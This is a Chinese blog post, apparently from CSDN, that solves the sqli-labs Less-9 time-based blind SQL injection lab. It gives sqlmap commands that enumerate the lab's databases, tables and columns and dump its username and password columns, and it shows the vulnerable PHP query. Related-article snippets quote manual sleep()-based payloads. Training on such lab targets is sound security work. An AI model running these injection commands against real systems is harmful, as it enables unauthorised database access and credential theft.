网络安全-sqlmap实战之sqlilabs-Less9

最新推荐文章于 2024-10-06 20:11:06 发布

lady_killer9

最新推荐文章于 2024-10-06 20:11:06 发布

阅读量1.2k

点赞数 1

分类专栏：网络安全文章标签： sql注入 sqlmap

本文链接：https://blog.youkuaiyun.com/lady_killer9/article/details/107022767

版权

网络安全专栏收录该内容

98 篇文章

订阅专栏

类型

时间盲注-单引号

-dbs枚举数据库

使用-o参数优化,,--technique参数指定技术，--batch参数进行跳过

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T -dbs --batch

太慢，继续优化

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -dbs --batch

这还运行了6分钟，有小伙伴可以更快吗?下方评论，十分感谢！

--tables枚举数据库表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security --tables --batch

--columns枚举列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users --columns --batch

--dump枚举数据

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users -C username,password --dump --batch

查看源代码

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

更多内容查看：网络安全-自学笔记

有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

lady_killer9

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

Sqlmap使用（sqli-lab）

Mccc_li的博客

05-06

3818

1.get使用方法： 1.查看是否有注入点：sqlmap -u 网址 2.爆出数据库名：sqlmap -u 网址 --dbs 5.爆出数据库的表名：sqlmap -u 网址 -D security --tables 6.爆出数据库的列名：sqlmap -u 网址 -D security -T users --columns 7.dump出数据：sqlmap -u -D security -...

网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump

2401_84248681的博客

04-29

315

错误回显sql语句猜测。

参与评论您还未登录，请先登录后发表或查看评论

使用sqlmap对sqli-less-9 的题解

weixin_44352058的博客

05-02

306

1.查找注入点 sqlmap.py -u http://localhost/sqli/Less-9/?id=1 2.存在时间盲注和布尔盲注，然后爆破数据库名 sqlmap.py -u http://localhost/sqli/Less-9/?id=1 –dbs 3.爆破表 sqlmap.py -u http://localhost/sqli/Less-9/?id=1 -D secu...

sqli-labs-less9

m0_68980215的博客

07-08

271

sql lesson9

SQLi LABS Less 9 时间盲注

热门推荐

wangyuxiang946的博客

06-22

1万+

SQLi 第九关，SQLi-LABS Less-9，SQLi-LABS Less 9，SQLiLABS Less9，SQLi Less 9

sqli-labs less-9

阿刁〇的博客

04-01

225

文章目录sqli-labs less-9* 判断注入* 判断列数* 查询详细信息 sqli-labs less-9 本关和前几关的注入方式又不一样，不过我们还是按步骤来 * 判断注入首先输入?id=1 回显正常 ?id=1' 回显正常 ?id=1" 回显正常由此可知，本关没有布尔类型状态，输入语句的正确与否回显均为You are in…，故本关采用延时注入的方式我们需要用到sleep函数 ?id=1' and (sleep(5)) --+ 耗时7秒 ?id=1 and (sleep(5))

网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where

2401_84254087的博客

05-02

160

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。

2024年最全网络安全-sqlmap实战之sqlilabs-Less12

2401_84300128的博客

05-01

446

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！不使用–batch了，有些默认选项他选的不是很好，导致比较慢。对于从来没有接触过网络安全的同学，我们帮你准备了详细的。内容实在太多，不一一截图了。

网络安全-sqlmap实战之sqlilabs-Less4_用kali中的sqlmap工具完成sqli-labs less-4

2401_84254087的博客

05-02

402

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

sqlilabs less9

TA不懒，但还没有添加简介

06-27

254

sqlilabs less9

sqli-labs靶场Less-9

songling515010475的专栏

08-25

211

1、访问首页，/Less-9/index.php?id=1，这里的传参点是id 探测六步判断是否是数字形传参判断是否有单引号闭合判断是否是双引号闭合判断是否单引号+括号闭合判断是否是双引号+括号闭合判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1 ' and sleep(10)-- qwe 分析：通过测试，这里是通过单引号闭合，同时使用延时注入才生效，哪么在以后SQL注入探测时，当前面5.

sqli-labs：less-9(时间盲注）

羽的博客

07-21

518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...

sqli-labs (less9-less10)

Xi4or0uji

07-27

819

less 9 get方法单引号绕过时间盲注这关是时间盲注，因为无论是对还是错，回显都是you are in，为了区分，我们可以用sleep()函数，错误的时候返回就会延时，方便我们判断 payload是?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sl...

sqli-labs 通关教程 Less 9 (时间盲注)

一期一会的博客

12-08

2795

利用正常的语句测试没有任何效果 http://127.0.0.1/sqlilabs/Less-9/?id=1 http://127.0.0.1/sqlilabs/Less-9/?id=1'-- - 数据完成交互后目标网站没有任何的页面回显，这个时候可以使用时间盲注。 http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(1=1,sleep(3),1)-- - //沉睡 http://127.0.0.1/sqlilabs/Less-9/?id=1 a.

SQL注入——sqli-labs-Less-9时间盲注_sqliless9，解析底层原理

2401_84433486的博客

04-17

912

测得第一列的名称的第一个字符是“i”，同样类推，得到第一列名为“id”，第二列“username”第三列“password”然后，第二个表名的第一位是“r”，依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来，但是相当费时间，我认为，手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”，递推下去得到表名：emails。止，不再深入研究，那么很难做到真正的技术提升。下面尝试注users表。

sqli-labs靶场less-9和less-10

最新发布

wanggonghanfei的博客

10-06

1091

dnslog注入通过less-9,10

Python黑客攻防（七）运用sqlmap对sqli-labs进行SQL注入

qq_43681532的博客

07-16

2699

前言：本篇主要讲解sqlmap的基本使用，对sqli-labs靶场的第一关进行SQL注入。后续九关的解题方法都和这个差不多，可以自己网上查资料学习，如果有时间也会更新对后续关卡的通关步骤。 sqlmap基础命令： sqlmap支持多种选项，-u 选项表示后面出现的是URL, --level 选项表示要执行的测试级别，–risk选项用于设置待执行测试的风险。风险表示攻击所用SQL代码的危险程度，风险等级越高，表示相关网站出现问题的可能性越高。 -level选项 0:仅输出Python反向追踪( Trac

时间盲注及Sqli-labs Less9

信安小菜鸡的博客

04-29

182

时间盲注对于布尔值都不返回的可以尝试采用时间盲注，即根据sleep函数与if语句组合再根据页面响应时间来判断条件是否正确。时间盲注常用函数： left(m,n) 从左向右截取字符串m返回前n位 substr(m,1,1) 取字符串m的左边第一位器，1字长的字符串 ascii(m) 返回字符串m的ASCII码 if(str1,str2,str3) 如果str1正确就执行str2，否则执行str3 sleep(m) 使程序暂停m秒 length(m) 返回字符串m的长度 count(column_name)

SQLMAP脚本-sql-labs-Less-28-29

m0_69844818的博客

01-03

474

HTTP参数污染（HTTP Parameter Pollution）攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞，可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。

搭建本地SQL注入靶场：sqli-labs实战教程